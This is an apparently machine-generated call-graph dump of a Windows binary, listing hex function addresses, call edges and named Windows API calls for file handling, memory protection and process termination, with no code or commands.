d81839 97134 d8d217 256 API calls 96837->97134 96840 dc636e 97138 de359c 82 API calls __wsopen_s 96840->97138 96841 d8152f 96843 d8153c 96841->96843 96844 dc63d1 96841->96844 96846 d81940 9 API calls 96843->96846 97140 df5745 54 API calls _wcslen 96844->97140 96847 d81549 96846->96847 96851 dc64fa 96847->96851 96853 d81940 9 API calls 96847->96853 96848 d8fddb 22 API calls 96848->96856 96849 d81872 97135 d8faeb 23 API calls 96849->97135 96850 d8fe0b 22 API calls 96850->96856 96860 dc6369 96851->96860 97141 de359c 82 API calls __wsopen_s 96851->97141 96858 d81563 96853->96858 96856->96837 96856->96840 96856->96841 96856->96848 96856->96850 96857 dc63b2 96856->96857 96856->96860 96894 d7ec40 96856->96894 97139 de359c 82 API calls __wsopen_s 96857->97139 96858->96851 96861 d7a8c7 22 API calls 96858->96861 96864 d815c7 ISource 96858->96864 96860->96813 96861->96864 96862 d81940 9 API calls 96862->96864 96863 d8171d 96863->96813 96864->96849 96864->96851 96864->96860 96864->96862 96866 d8167b ISource 96864->96866 96873 d74f39 68 API calls 96864->96873 96918 df959f 96864->96918 96921 def0ec 96864->96921 96930 d8effa 96864->96930 96987 df958b 96864->96987 96990 ddd4ce 96864->96990 96993 de6ef1 96864->96993 97073 de744a 96864->97073 96866->96863 97130 d8ce17 22 API calls ISource 96866->97130 96873->96864 96875->96813 96876->96813 96877->96784 96878->96790 96879->96807 96880->96807 96881->96807 96882->96812 96883->96807 96885 d81981 96884->96885 96890 d8195d 96884->96890 97142 d90242 5 API calls __Init_thread_wait 96885->97142 96886 d813a0 96886->96828 96888 d8198b 96888->96890 97143 d901f8 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent 96888->97143 96890->96886 97144 d90242 5 API calls __Init_thread_wait 96890->97144 96891 d88727 96891->96886 97145 d901f8 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent 96891->97145 96913 d7ec76 ISource 96894->96913 96895 d901f8 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96895->96913 96896 d8fddb 22 API calls 96896->96913 96897 d7fef7 96905 d7a8c7 22 API calls 96897->96905 96911 d7ed9d ISource 96897->96911 96900 dc4b0b 97149 de359c 82 API calls __wsopen_s 96900->97149 96901 d7a8c7 22 API calls 96901->96913 96902 dc4600 96906 d7a8c7 22 API calls 96902->96906 96902->96911 96905->96911 96906->96911 96908 d90242 RtlEnterCriticalSection RtlLeaveCriticalSection RtlLeaveCriticalSection WaitForSingleObjectEx RtlEnterCriticalSection 96908->96913 96909 d7fbe3 96909->96911 96912 dc4bdc 96909->96912 96917 d7f3ae ISource 96909->96917 96910 d7a961 22 API calls 96910->96913 96911->96856 97150 de359c 82 API calls __wsopen_s 96912->97150 96913->96895 96913->96896 96913->96897 96913->96900 96913->96901 96913->96902 96913->96908 96913->96909 96913->96910 96913->96911 96914 d900a3 29 API calls pre_c_initialization 96913->96914 96916 dc4beb 96913->96916 96913->96917 97146 d801e0 256 API calls 2 library calls 96913->97146 97147 d806a0 41 API calls ISource 96913->97147 96914->96913 97151 de359c 82 API calls __wsopen_s 96916->97151 96917->96911 97148 de359c 82 API calls __wsopen_s 96917->97148 97152 df7f59 96918->97152 96920 df95af 96920->96864 96922 d77510 53 API calls 96921->96922 96923 def126 96922->96923 97285 d79e90 96923->97285 96925 def136 96926 def15b 96925->96926 96927 d7ec40 256 API calls 96925->96927 96929 def15f 96926->96929 97313 d79c6e 96926->97313 96927->96926 96929->96864 96931 d79c6e 22 API calls 96930->96931 96932 d8f012 96931->96932 96933 d8fddb 22 API calls 96932->96933 96939 dcf0a8 96932->96939 96935 d8f02b 96933->96935 96936 d8fe0b 22 API calls 96935->96936 96938 d8f03c 96936->96938 96937 d8f0a4 96945 d8f0b1 96937->96945 97355 d7b567 96937->97355 97360 d76246 96938->97360 96939->96937 97392 de9caa 39 API calls 96939->97392 96943 dcf10a 96943->96945 96946 dcf112 96943->96946 96944 d7a961 22 API calls 96947 d8f04f 96944->96947 97336 d8fa5b 96945->97336 96950 d7b567 39 API calls 96946->96950 96948 d76246 CloseHandle 96947->96948 96951 d8f056 96948->96951 96955 d8f0b8 96950->96955 96952 d77510 53 API calls 96951->96952 96953 d8f062 96952->96953 96954 d76246 CloseHandle 96953->96954 96956 d8f06c 96954->96956 96957 dcf127 96955->96957 96958 d8f0d3 96955->96958 97364 d75745 96956->97364 96961 d8fe0b 22 API calls 96957->96961 96960 d76270 22 API calls 96958->96960 96963 d8f0db 96960->96963 96964 dcf12c 96961->96964 97341 d8f141 96963->97341 96968 dcf140 96964->96968 97393 d8f866 ReadFile SetFilePointerEx 96964->97393 96965 dcf0a0 97391 d76216 CloseHandle ISource 96965->97391 96966 d8f085 97372 d753de 96966->97372 96976 dcf144 __fread_nolock 96968->96976 97394 de0e85 22 API calls ___scrt_fastfail 96968->97394 96971 d8f0ea 96971->96976 97388 d762b5 22 API calls 96971->97388 96975 d8f093 97387 d753c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96975->97387 96978 d8f0fe 96979 d8f138 96978->96979 96982 d76246 CloseHandle 96978->96982 96979->96864 96980 dcf069 97390 ddccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 96980->97390 96981 d8f09a 96981->96937 96981->96980 96983 d8f12c 96982->96983 96983->96979 97389 d76216 CloseHandle ISource 96983->97389 96985 dcf080 96985->96937 96988 df7f59 120 API calls 96987->96988 96989 df959b 96988->96989 96989->96864 97459 dddbbe lstrlenW 96990->97459 96994 d7a961 22 API calls 96993->96994 96995 de6f1d 96994->96995 96996 d7a961 22 API calls 96995->96996 96997 de6f26 96996->96997 96998 de6f3a 96997->96998 96999 d7b567 39 API calls 96997->96999 97000 d77510 53 API calls 96998->97000 96999->96998 97003 de6f57 _wcslen 97000->97003 97001 de70bf 97005 d74ecb 94 API calls 97001->97005 97002 de6fbc 97004 d77510 53 API calls 97002->97004 97003->97001 97003->97002 97013 de70e9 97003->97013 97006 de6fc8 97004->97006 97007 de70d0 97005->97007 97010 d7a8c7 22 API calls 97006->97010 97015 de6fdb 97006->97015 97008 de70e5 97007->97008 97011 d74ecb 94 API calls 97007->97011 97009 d7a961 22 API calls 97008->97009 97008->97013 97012 de711a 97009->97012 97010->97015 97011->97008 97014 d7a961 22 API calls 97012->97014 97013->96864 97018 de7126 97014->97018 97016 de7027 97015->97016 97019 de7005 97015->97019 97023 d7a8c7 22 API calls 97015->97023 97017 d77510 53 API calls 97016->97017 97021 de7034 97017->97021 97022 d7a961 22 API calls 97018->97022 97020 d733c6 22 API calls 97019->97020 97024 de700f 97020->97024 97025 de703d 97021->97025 97026 de7047 97021->97026 97027 de712f 97022->97027 97023->97019 97028 d77510 53 API calls 97024->97028 97029 d7a8c7 22 API calls 97025->97029 97615 dde199 GetFileAttributesW 97026->97615 97031 d7a961 22 API calls 97027->97031 97032 de701b 97028->97032 97029->97026 97034 de7138 97031->97034 97035 d76350 22 API calls 97032->97035 97033 de7050 97036 de7063 97033->97036 97039 d74c6d 22 API calls 97033->97039 97037 d77510 53 API calls 97034->97037 97035->97016 97038 d77510 53 API calls 97036->97038 97046 de7069 97036->97046 97040 de7145 97037->97040 97042 de70a0 97038->97042 97039->97036 97464 d7525f 97040->97464 97616 ddd076 57 API calls 97042->97616 97043 de7166 97045 d74c6d 22 API calls 97043->97045 97047 de7175 97045->97047 97046->97013 97048 de71a9 97047->97048 97049 d74c6d 22 API calls 97047->97049 97050 d7a8c7 22 API calls 97048->97050 97051 de7186 97049->97051 97052 de71ba 97050->97052 97051->97048 97054 d76b57 22 API calls 97051->97054 97053 d76350 22 API calls 97052->97053 97055 de71c8 97053->97055 97057 de719b 97054->97057 97056 d76350 22 API calls 97055->97056 97058 de71d6 97056->97058 97059 d76b57 22 API calls 97057->97059 97060 d76350 22 API calls 97058->97060 97059->97048 97061 de71e4 97060->97061 97062 d77510 53 API calls 97061->97062 97063 de71f0 97062->97063 97506 ddd7bc 97063->97506 97065 de7201 97066 ddd4ce 4 API calls 97065->97066 97067 de720b 97066->97067 97068 d77510 53 API calls 97067->97068 97071 de7239 97067->97071 97069 de7229 97068->97069 97560 de2947 97069->97560 97072 d74f39 68 API calls 97071->97072 97072->97013 97074 de7474 97073->97074 97075 de7469 97073->97075 97079 d7a961 22 API calls 97074->97079 97112 de7554 97074->97112 97076 d7b567 39 API calls 97075->97076 97076->97074 97077 d8fddb 22 API calls 97078 de7587 97077->97078 97080 d8fe0b 22 API calls 97078->97080 97081 de7495 97079->97081 97082 de7598 97080->97082 97083 d7a961 22 API calls 97081->97083 97084 d76246 CloseHandle 97082->97084 97085 de749e 97083->97085 97087 de75a3 97084->97087 97086 d77510 53 API calls 97085->97086 97088 de74aa 97086->97088 97089 d7a961 22 API calls 97087->97089 97090 d7525f 22 API calls 97088->97090 97091 de75ab 97089->97091 97092 de74bf 97090->97092 97093 d76246 CloseHandle 97091->97093 97094 d76350 22 API calls 97092->97094 97095 de75b2 97093->97095 97096 de74f2 97094->97096 97097 d77510 53 API calls 97095->97097 97098 de754a 97096->97098 97100 ddd4ce 4 API calls 97096->97100 97099 de75be 97097->97099 97102 d7b567 39 API calls 97098->97102 97101 d76246 CloseHandle 97099->97101 97103 de7502 97100->97103 97104 de75c8 97101->97104 97102->97112 97103->97098 97105 de7506 97103->97105 97106 d75745 5 API calls 97104->97106 97107 d79cb3 22 API calls 97105->97107 97108 de75e2 97106->97108 97109 de7513 97107->97109 97110 de76de GetLastError 97108->97110 97111 de75ea 97108->97111 97626 ddd2c1 26 API calls 97109->97626 97114 de76f7 97110->97114 97116 d753de 27 API calls 97111->97116 97112->97077 97119 de76a4 97112->97119 97630 d76216 CloseHandle ISource 97114->97630 97115 de751c 97115->97098 97118 de75f8 97116->97118 97627 d753c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97118->97627 97119->96864 97121 de7645 97122 d8fddb 22 API calls 97121->97122 97125 de7679 97122->97125 97123 de7619 97628 ddccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 97123->97628 97124 de75ff 97124->97121 97124->97123 97127 d7a961 22 API calls 97125->97127 97128 de7686 97127->97128 97128->97119 97629 dd417d 22 API calls __fread_nolock 97128->97629 97130->96866 97131->96825 97132->96827 97133->96837 97134->96849 97135->96849 97136->96823 97137->96860 97138->96860 97139->96860 97140->96858 97141->96860 97142->96888 97143->96890 97144->96891 97145->96886 97146->96913 97147->96913 97148->96911 97149->96911 97150->96916 97151->96911 97190 d77510 97152->97190 97156 df8281 97157 df844f 97156->97157 97163 df828f 97156->97163 97254 df8ee4 60 API calls 97157->97254 97160 df845e 97162 df846a 97160->97162 97160->97163 97161 d77510 53 API calls 97180 df8049 97161->97180 97178 df7fd5 ISource 97162->97178 97226 df7e86 97163->97226 97168 df82c8 97241 d8fc70 97168->97241 97171 df82e8 97247 de359c 82 API calls __wsopen_s 97171->97247 97172 df8302 97248 d763eb 22 API calls 97172->97248 97175 df82f3 GetCurrentProcess TerminateProcess 97175->97172 97176 df8311 97249 d76a50 22 API calls 97176->97249 97178->96920 97179 df832a 97189 df8352 97179->97189 97250 d804f0 22 API calls 97179->97250 97180->97156 97180->97161 97180->97178 97245 dd417d 22 API calls __fread_nolock 97180->97245 97246 df851d 42 API calls _strftime 97180->97246 97181 df84c5 97181->97178 97186 df84d9 FreeLibrary 97181->97186 97183 df8341 97251 df8b7b 75 API calls 97183->97251 97186->97178 97189->97181 97252 d804f0 22 API calls 97189->97252 97253 d7aceb 23 API calls ISource 97189->97253 97255 df8b7b 75 API calls 97189->97255 97191 d77525 97190->97191 97192 d77522 97190->97192 97193 d7752d 97191->97193 97194 d7755b 97191->97194 97192->97178 97213 df8cd3 97192->97213 97256 d951c6 26 API calls 97193->97256 97196 db50f6 97194->97196 97197 d7756d 97194->97197 97204 db500f 97194->97204 97259 d95183 26 API calls 97196->97259 97257 d8fb21 51 API calls 97197->97257 97198 d7753d 97203 d8fddb 22 API calls 97198->97203 97201 db510e 97201->97201 97205 d77547 97203->97205 97207 d8fe0b 22 API calls 97204->97207 97212 db5088 97204->97212 97206 d79cb3 22 API calls 97205->97206 97206->97192 97209 db5058 97207->97209 97208 d8fddb 22 API calls 97210 db507f 97208->97210 97209->97208 97211 d79cb3 22 API calls 97210->97211 97211->97212 97258 d8fb21 51 API calls 97212->97258 97214 d7aec9 22 API calls 97213->97214 97215 df8cee CharLowerBuffW 97214->97215 97260 dd8e54 97215->97260 97219 d7a961 22 API calls 97220 df8d2a 97219->97220 97267 d76d25 97220->97267 97222 df8d3e 97223 d793b2 22 API calls 97222->97223 97225 df8d48 _wcslen 97223->97225 97224 df8e5e _wcslen 97224->97180 97225->97224 97280 df851d 42 API calls _strftime 97225->97280 97227 df7eec 97226->97227 97228 df7ea1 97226->97228 97232 df9096 97227->97232 97229 d8fe0b 22 API calls 97228->97229 97230 df7ec3 97229->97230 97230->97227 97231 d8fddb 22 API calls 97230->97231 97231->97230 97233 df92ab ISource 97232->97233 97238 df90ba _strcat _wcslen 97232->97238 97233->97168 97234 d7b567 39 API calls 97234->97238 97235 d7b38f 39 API calls 97235->97238 97236 d7b6b5 39 API calls 97236->97238 97237 d77510 53 API calls 97237->97238 97238->97233 97238->97234 97238->97235 97238->97236 97238->97237 97239 d9ea0c 21 API calls ___std_exception_copy 97238->97239 97284 ddefae 24 API calls _wcslen 97238->97284 97239->97238 97243 d8fc85 97241->97243 97242 d8fd1d VirtualProtect 97244 d8fceb 97242->97244 97243->97242 97243->97244 97244->97171 97244->97172 97245->97180 97246->97180 97247->97175 97248->97176 97249->97179 97250->97183 97251->97189 97252->97189 97253->97189 97254->97160 97255->97189 97256->97198 97257->97198 97258->97196 97259->97201 97261 dd8e74 _wcslen 97260->97261 97262 dd8f63 97261->97262 97263 dd8ea9 97261->97263 97266 dd8f68 97261->97266 97262->97219 97262->97225 97263->97262 97281 d8ce60 41 API calls 97263->97281 97266->97262 97282 d8ce60 41 API calls 97266->97282 97268 d76d34 97267->97268 97269 d76d91 97267->97269 97268->97269 97270 d76d3f 97268->97270 97271 d793b2 22 API calls 97269->97271 97272 db4c9d 97270->97272 97273 d76d5a 97270->97273 97276 d76d62 __fread_nolock 97271->97276 97275 d8fddb 22 API calls 97272->97275 97283 d76f34 22 API calls 97273->97283 97277 db4ca7 97275->97277 97276->97222 97278 d8fe0b 22 API calls 97277->97278 97279 db4cda 97278->97279 97280->97224 97281->97263 97282->97266 97283->97276 97284->97238 97286 d76270 22 API calls 97285->97286 97312 d79eb5 97286->97312 97287 d79fd2 97328 d7a4a1 22 API calls __fread_nolock 97287->97328 97289 d79fec 97289->96925 97292 d7a6c3 22 API calls 97292->97312 97293 dbf7c4 97333 dd96e2 84 API calls __wsopen_s 97293->97333 97294 dbf699 97300 d8fddb 22 API calls 97294->97300 97295 d7a405 97295->97289 97335 dd96e2 84 API calls __wsopen_s 97295->97335 97298 d7a4a1 22 API calls 97298->97312 97302 dbf754 97300->97302 97301 dbf7d2 97334 d7a4a1 22 API calls __fread_nolock 97301->97334 97305 d8fe0b 22 API calls 97302->97305 97304 dbf7e8 97304->97289 97307 d7a12c __fread_nolock 97305->97307 97307->97293 97307->97295 97308 d7a587 22 API calls 97308->97312 97309 d7aec9 22 API calls 97310 d7a0db CharUpperBuffW 97309->97310 97329 d7a673 22 API calls 97310->97329 97312->97287 97312->97292 97312->97293 97312->97294 97312->97295 97312->97298 97312->97307 97312->97308 97312->97309 97327 d74573 41 API calls _wcslen 97312->97327 97330 d748c8 23 API calls 97312->97330 97331 d749bd 22 API calls __fread_nolock 97312->97331 97332 d7a673 22 API calls 97312->97332 97314 d79c7e 97313->97314 97315 dbf545 97313->97315 97320 d8fddb 22 API calls 97314->97320 97316 dbf556 97315->97316 97317 d76b57 22 API calls 97315->97317 97318 d7a6c3 22 API calls 97316->97318 97317->97316 97319 dbf560 97318->97319 97319->97319 97321 d79c91 97320->97321 97322 d79cac 97321->97322 97323 d79c9a 97321->97323 97325 d7a961 22 API calls 97322->97325 97324 d79cb3 22 API calls 97323->97324 97326 d79ca2 97324->97326 97325->97326 97326->96929 97327->97312 97328->97289 97329->97312 97330->97312 97331->97312 97332->97312 97333->97301 97334->97304 97335->97289 97395 d754c6 97336->97395 97339 d754c6 3 API calls 97340 d8fa9a 97339->97340 97340->96955 97342 d8f14c 97341->97342 97343 d8f188 97341->97343 97342->97343 97345 d8f15b 97342->97345 97344 d7a6c3 22 API calls 97343->97344 97351 ddcaeb 97344->97351 97347 d8f170 97345->97347 97349 d8f17d 97345->97349 97346 ddcb1a 97346->96971 97401 d8f18e 97347->97401 97408 ddcbf2 26 API calls 97349->97408 97351->97346 97409 ddca89 ReadFile SetFilePointerEx 97351->97409 97410 d749bd 22 API calls __fread_nolock 97351->97410 97352 d8f179 97352->96971 97356 d7b578 97355->97356 97357 d7b57f 97355->97357 97356->97357 97458 d962d1 39 API calls 97356->97458 97357->96943 97359 d7b5c2 97359->96943 97361 d76250 97360->97361 97362 d7625f 97360->97362 97361->96944 97362->97361 97363 d76264 CloseHandle 97362->97363 97363->97361 97365 d7575c CreateFileW 97364->97365 97366 db4035 97364->97366 97368 d7577b 97365->97368 97367 db403b CreateFileW 97366->97367 97366->97368 97367->97368 97369 db4063 97367->97369 97368->96965 97368->96966 97370 d754c6 3 API calls 97369->97370 97371 db406e 97370->97371 97371->97368 97373 d753f3 97372->97373 97386 d753f0 ISource 97372->97386 97374 d754c6 3 API calls 97373->97374 97373->97386 97375 d75410 97374->97375 97376 db3f4b 97375->97376 97377 d7541d 97375->97377 97378 d8fa5b 3 API calls 97376->97378 97379 d8fe0b 22 API calls 97377->97379 97378->97386 97380 d75429 97379->97380 97381 d75722 22 API calls 97380->97381 97382 d75433 97381->97382 97383 d79a40 2 API calls 97382->97383 97384 d7543f 97383->97384 97385 d754c6 3 API calls 97384->97385 97385->97386 97386->96975 97387->96981 97388->96978 97389->96979 97390->96985 97391->96939 97392->96939 97393->96968 97394->96976 97400 d754dd 97395->97400 97396 d75564 SetFilePointerEx SetFilePointerEx 97398 d75530 97396->97398 97397 db3f9c SetFilePointerEx 97398->97339 97399 db3f8b 97399->97397 97400->97396 97400->97397 97400->97398 97400->97399 97411 d8f1d8 97401->97411 97407 d8f1c1 97407->97352 97408->97352 97409->97351 97410->97351 97412 d8fe0b 22 API calls 97411->97412 97413 d8f1ef 97412->97413 97414 d8fddb 22 API calls 97413->97414 97415 d8f1a6 97414->97415 97416 d797b6 97415->97416 97430 d79a1e 97416->97430 97419 d797c7 97420 d797fc 97419->97420 97437 d79a40 97419->97437 97443 d79b01 22 API calls __fread_nolock 97419->97443 97420->97407 97422 d76e14 MultiByteToWideChar 97420->97422 97423 d76e87 97422->97423 97424 d76e40 97422->97424 97425 d7a6c3 22 API calls 97423->97425 97426 d8fe0b 22 API calls 97424->97426 97427 d76e7b 97425->97427 97428 d76e55 MultiByteToWideChar 97426->97428 97427->97407 97445 d76e90 97428->97445 97431 dbf378 97430->97431 97432 d79a2f 97430->97432 97433 d8fddb 22 API calls 97431->97433 97432->97419 97434 dbf382 97433->97434 97435 d8fe0b 22 API calls 97434->97435 97436 dbf397 97435->97436 97438 d79abb 97437->97438 97441 d79a4e 97437->97441 97444 d8e40f SetFilePointerEx 97438->97444 97440 d79a7c 97440->97419 97441->97440 97442 d79a8c ReadFile 97441->97442 97442->97440 97442->97441 97443->97419 97444->97441 97446 d76f24 97445->97446 97447 d76ea3 97445->97447 97448 d793b2 22 API calls 97446->97448 97447->97446 97450 d76eaf 97447->97450 97449 d76ec1 __fread_nolock 97448->97449 97449->97427 97451 d76ee7 97450->97451 97452 d76eb9 97450->97452 97454 d8fddb 22 API calls 97451->97454 97457 d76f34 22 API calls 97452->97457 97455 d76ef1 97454->97455 97456 d8fe0b 22 API calls 97455->97456 97456->97449 97457->97449 97458->97359 97460 dddbdc GetFileAttributesW 97459->97460 97461 ddd4d5 97459->97461 97460->97461 97462 dddbe8 FindFirstFileW 97460->97462 97461->96864 97462->97461 97463 dddbf9 FindClose 97462->97463 97463->97461 97465 d7a961 22 API calls 97464->97465 97466 d75275 97465->97466 97467 d7a961 22 API calls 97466->97467 97468 d7527d 97467->97468 97469 d7a961 22 API calls 97468->97469 97470 d75285 97469->97470 97471 d7a961 22 API calls 97470->97471 97472 d7528d 97471->97472 97473 d752c1 97472->97473 97474 db3df5 97472->97474 97476 d76d25 22 API calls 97473->97476 97475 d7a8c7 22 API calls 97474->97475 97477 db3dfe 97475->97477 97478 d752cf 97476->97478 97479 d7a6c3 22 API calls 97477->97479 97480 d793b2 22 API calls 97478->97480 97482 d75304 97479->97482 97481 d752d9 97480->97481 97481->97482 97484 d76d25 22 API calls 97481->97484 97483 d75349 97482->97483 97485 d75325 97482->97485 97502 db3e20 97482->97502 97486 d76d25 22 API calls 97483->97486 97487 d752fa 97484->97487 97485->97483 97490 d74c6d 22 API calls 97485->97490 97489 d7535a 97486->97489 97488 d793b2 22 API calls 97487->97488 97488->97482 97491 d75370 97489->97491 97495 d7a8c7 22 API calls 97489->97495 97493 d75332 97490->97493 97492 d75384 97491->97492 97497 d7a8c7 22 API calls 97491->97497 97496 d7538f 97492->97496 97499 d7a8c7 22 API calls 97492->97499 97493->97483 97498 d76d25 22 API calls 97493->97498 97494 d76b57 22 API calls 97503 db3ee0 97494->97503 97495->97491 97500 d7a8c7 22 API calls 97496->97500 97504 d7539a 97496->97504 97497->97492 97498->97483 97499->97496 97500->97504 97501 d74c6d 22 API calls 97501->97503 97502->97494 97503->97483 97503->97501 97617 d749bd 22 API calls __fread_nolock 97503->97617 97504->97043 97507 ddd7d8 97506->97507 97508 ddd7dd 97507->97508 97509 ddd7f3 97507->97509 97511 d7a8c7 22 API calls 97508->97511 97559 ddd7ee 97508->97559 97510 d7a961 22 API calls 97509->97510 97512 ddd7fb 97510->97512 97511->97559 97513 d7a961 22 API calls 97512->97513 97514 ddd803 97513->97514 97515 d7a961 22 API calls 97514->97515 97516 ddd80e 97515->97516 97517 d7a961 22 API calls 97516->97517 97518 ddd816 97517->97518 97519 d7a961 22 API calls 97518->97519 97520 ddd81e 97519->97520 97521 d7a961 22 API calls 97520->97521 97522 ddd826 97521->97522 97523 d7a961 22 API calls 97522->97523 97524 ddd82e 97523->97524 97525 d7a961 22 API calls 97524->97525 97526 ddd836 97525->97526 97527 d7525f 22 API calls 97526->97527 97528 ddd84d 97527->97528 97529 d7525f 22 API calls 97528->97529 97530 ddd866 97529->97530 97531 d74c6d 22 API calls 97530->97531 97532 ddd872 97531->97532 97533 ddd885 97532->97533 97534 d793b2 22 API calls 97532->97534 97535 d74c6d 22 API calls 97533->97535 97534->97533 97536 ddd88e 97535->97536 97537 ddd89e 97536->97537 97538 d793b2 22 API calls 97536->97538 97539 ddd8b0 97537->97539 97540 d7a8c7 22 API calls 97537->97540 97538->97537 97541 d76350 22 API calls 97539->97541 97540->97539 97542 ddd8bb 97541->97542 97618 ddd978 22 API calls 97542->97618 97544 ddd8ca 97619 ddd978 22 API calls 97544->97619 97546 ddd8dd 97547 d74c6d 22 API calls 97546->97547 97548 ddd8e7 97547->97548 97549 ddd8ec 97548->97549 97550 ddd8fe 97548->97550 97551 d733c6 22 API calls 97549->97551 97552 d74c6d 22 API calls 97550->97552 97553 ddd8f9 97551->97553 97554 ddd907 97552->97554 97557 d76350 22 API calls 97553->97557 97555 ddd925 97554->97555 97556 d733c6 22 API calls 97554->97556 97558 d76350 22 API calls 97555->97558 97556->97553 97557->97555 97558->97559 97559->97065 97561 de2954 __wsopen_s 97560->97561 97562 d8fe0b 22 API calls 97561->97562 97563 de2971 97562->97563 97564 d75722 22 API calls 97563->97564 97565 de297b 97564->97565 97566 de274e 27 API calls 97565->97566 97567 de2986 97566->97567 97568 d7511f 64 API calls 97567->97568 97569 de299b 97568->97569 97570 de29bf 97569->97570 97571 de2a6c 97569->97571 97572 de2e66 75 API calls 97570->97572 97573 de2e66 75 API calls 97571->97573 97574 de29c4 97572->97574 97588 de2a38 97573->97588 97579 de2a75 ISource 97574->97579 97624 d9d583 26 API calls 97574->97624 97576 d750f5 40 API calls 97577 de2a91 97576->97577 97578 d750f5 40 API calls 97577->97578 97581 de2aa1 97578->97581 97579->97071 97580 de29ed 97625 d9d583 26 API calls 97580->97625 97582 d750f5 40 API calls 97581->97582 97584 de2abc 97582->97584 97585 d750f5 40 API calls 97584->97585 97586 de2acc 97585->97586 97587 d750f5 40 API calls 97586->97587 97589 de2ae7 97587->97589 97588->97576 97588->97579 97590 d750f5 40 API calls 97589->97590 97591 de2af7 97590->97591 97592 d750f5 40 API calls 97591->97592 97593 de2b07 97592->97593 97594 d750f5 40 API calls 97593->97594 97595 de2b17 97594->97595 97620 de3017 GetTempPathW GetTempFileNameW 97595->97620 97597 de2b22 97598 d9e5eb 29 API calls 97597->97598 97600 de2b33 97598->97600 97599 d9e678 67 API calls 97601 de2bf8 97599->97601 97600->97579 97602 d750f5 40 API calls 97600->97602 97609 d9dbb3 65 API calls 97600->97609 97611 de2bed 97600->97611 97603 de2bfe DeleteFileW 97601->97603 97604 de2c12 97601->97604 97602->97600 97603->97579 97605 de2c91 CopyFileW 97604->97605 97610 de2c18 97604->97610 97606 de2cb9 DeleteFileW 97605->97606 97607 de2ca7 DeleteFileW 97605->97607 97621 de2fd8 CreateFileW 97606->97621 97607->97579 97609->97600 97612 de22ce 79 API calls 97610->97612 97611->97599 97613 de2c7c 97612->97613 97613->97606 97614 de2c80 DeleteFileW 97613->97614 97614->97579 97615->97033 97616->97046 97617->97503 97618->97544 97619->97546 97620->97597 97622 de2fff SetFileTime CloseHandle 97621->97622 97623 de3013 97621->97623 97622->97623 97623->97579 97624->97580 97625->97588 97626->97115 97627->97124 97628->97121 97629->97119 97630->97119 97631 dc3f75 97632 d8ceb1 23 API calls 97631->97632 97633 dc3f8b 97632->97633 97634 dc4006 97633->97634 97700 d8e300 23 API calls 97633->97700 97642 d7bf40 97634->97642 97636 dc3fe6 97639 dc4052 97636->97639 97701 de1abf 22 API calls 97636->97701 97640 dc4a88 97639->97640 97702 de359c 82 API calls __wsopen_s 97639->97702 97703 d7adf0 97642->97703 97644 d7bf9d 97645 dc04b6 97644->97645 97646 d7bfa9 97644->97646 97722 de359c 82 API calls __wsopen_s 97645->97722 97648 dc04c6 97646->97648 97649 d7c01e 97646->97649 97723 de359c 82 API calls __wsopen_s 97648->97723 97708 d7ac91 97649->97708 97652 dd7120 22 API calls 97696 d7c039 ISource __fread_nolock 97652->97696 97654 d7c7da 97657 d8fe0b 22 API calls 97654->97657 97662 d7c808 __fread_nolock 97657->97662 97659 dc04f5 97663 dc055a 97659->97663 97724 d8d217 256 API calls 97659->97724 97666 d8fe0b 22 API calls 97662->97666 97685 d7c603 97663->97685 97725 de359c 82 API calls __wsopen_s 97663->97725 97664 d7ec40 256 API calls 97664->97696 97665 dc091a 97735 de3209 23 API calls 97665->97735 97697 d7c350 ISource __fread_nolock 97666->97697 97667 d7af8a 22 API calls 97667->97696 97670 dc08a5 97671 d7ec40 256 API calls 97670->97671 97673 dc08cf 97671->97673 97673->97685 97733 d7a81b 41 API calls 97673->97733 97674 dc0591 97726 de359c 82 API calls __wsopen_s 97674->97726 97675 dc08f6 97734 de359c 82 API calls __wsopen_s 97675->97734 97679 d7bbe0 40 API calls 97679->97696 97681 d7c237 97683 d7c253 97681->97683 97684 d7a8c7 22 API calls 97681->97684 97687 dc0976 97683->97687 97691 d7c297 ISource 97683->97691 97684->97683 97685->97639 97686 d8fddb 22 API calls 97686->97696 97736 d7aceb 23 API calls ISource 97687->97736 97690 dc09bf 97690->97685 97737 de359c 82 API calls __wsopen_s 97690->97737 97691->97690 97719 d7aceb 23 API calls ISource 97691->97719 97693 d7c335 97693->97690 97694 d7c342 97693->97694 97720 d7a704 22 API calls ISource 97694->97720 97696->97652 97696->97654 97696->97659 97696->97662 97696->97663 97696->97664 97696->97665 97696->97667 97696->97670 97696->97674 97696->97675 97696->97679 97696->97681 97696->97685 97696->97686 97696->97690 97698 d8fe0b 22 API calls 97696->97698 97712 d7ad81 97696->97712 97727 dd7099 22 API calls __fread_nolock 97696->97727 97728 df5745 54 API calls _wcslen 97696->97728 97729 d8aa42 22 API calls ISource 97696->97729 97730 ddf05c 40 API calls 97696->97730 97731 d7a993 41 API calls 97696->97731 97732 d7aceb 23 API calls ISource 97696->97732 97699 d7c3ac 97697->97699 97721 d8ce17 22 API calls ISource 97697->97721 97698->97696 97699->97639 97700->97636 97701->97634 97702->97640 97704 d7ae01 97703->97704 97707 d7ae1c ISource 97703->97707 97705 d7aec9 22 API calls 97704->97705 97706 d7ae09 CharUpperBuffW 97705->97706 97706->97707 97707->97644 97709 d7acae 97708->97709 97710 d7acd1 97709->97710 97738 de359c 82 API calls __wsopen_s 97709->97738 97710->97696 97713 dbfadb 97712->97713 97714 d7ad92 97712->97714 97715 d8fddb 22 API calls 97714->97715 97716 d7ad99 97715->97716 97739 d7adcd 97716->97739 97719->97693 97720->97697 97721->97697 97722->97648 97723->97685 97724->97663 97725->97685 97726->97685 97727->97696 97728->97696 97729->97696 97730->97696 97731->97696 97732->97696 97733->97675 97734->97685 97735->97681 97736->97690 97737->97685 97738->97710 97743 d7addd 97739->97743 97740 d7adb6 97740->97696 97741 d8fddb 22 API calls 97741->97743 97742 d7a961 22 API calls 97742->97743 97743->97740 97743->97741 97743->97742 97744 d7a8c7 22 API calls 97743->97744 97745 d7adcd 22 API calls 97743->97745 97744->97743 97745->97743 97746 d71098 97751 d742de 97746->97751 97750 d710a7 97752 d7a961 22 API calls 97751->97752 97753 d742f5 GetVersionExW 97752->97753 97754 d76b57 22 API calls 